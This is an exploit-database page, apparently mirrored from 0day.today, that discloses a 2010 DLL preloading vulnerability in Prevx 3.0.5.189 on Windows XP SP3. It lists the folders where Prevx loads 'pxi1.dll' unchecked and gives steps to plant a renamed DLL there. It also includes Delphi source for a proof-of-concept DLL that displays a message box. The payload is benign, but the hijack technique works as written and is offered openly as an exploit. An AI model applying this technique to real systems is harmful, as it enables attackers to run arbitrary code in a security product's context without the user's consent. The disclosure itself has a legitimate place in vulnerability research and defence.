Lucene search
K

Prevx DLL preloading exploit

🗓️ 12 Sep 2010 00:00:00Reported by STRELiTZIAType 
zdt
 zdt
🔗 0day.today👁 13 Views

Prevx DLL preloading vulnerability allows local code execution without user consen

Code
============================
Prevx DLL preloading exploit
============================

============================
Prevx DLL preloading exploit
============================

====================================================
=       PREVX DLL PRELOADING EXPLOIT       =
====================================================

Exploit Title  : [Prevx DLL preloading exploit]
Date           : [11 Sept 2010]
Author         : [STRELiTZIA]
Software       : [Prevx 3.0.5.189]
Tested on      : [Windows Xp SP3]
	
============================
=       Description        = 
============================
Prevx search and laod "pxi1.dll" library without checks, or any visual warning messages related to
library modifications.
Vulnerability that can allow attackers to execute malicious code locally, without user consent, in the privilege
context of the targeted application.
 
 
============================
=       Instructions       =
============================
Default searching folders:
C:\WINDOWS\pxi1.dll
C:\WINDOWS\system\pxi1.dll
C:\WINDOWS\system32\pxi1.dll
C:\WINDOWS\system32\wbem\pxi1.dll

Additional folders if exists:
C:\Program Files\Borland\Delphi7\Bin\pxi1.dll
C:\Program Files\Borland\Delphi7\Projects\Bpl\pxi1.dll
C:\Documents and Settings\All Users\Documents\RAD Studio\7.0\Bpl\pxi1.dll


1- Copy "Test.dll" into "%One of listed folders% folder"
2- Rename "Test.dll" to "pxi1.dll"

============================
=          Tests           =
============================
- Launch Prevx.
- Restart your PC.
	
============================
= Test Dll Source "Delphi" =
============================
Library Test;
uses
  Windows;

begin
  MessageBoxA
    (
    0,
    PChar('Yep, I''m running in your system without your permission.'),
	PChar('Sample'),
    MB_ICONSTOP
    );
end.





#  0day.today [2018-03-31]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

12 Sep 2010 00:00Current
6.8Medium risk
Vulners AI Score6.8
13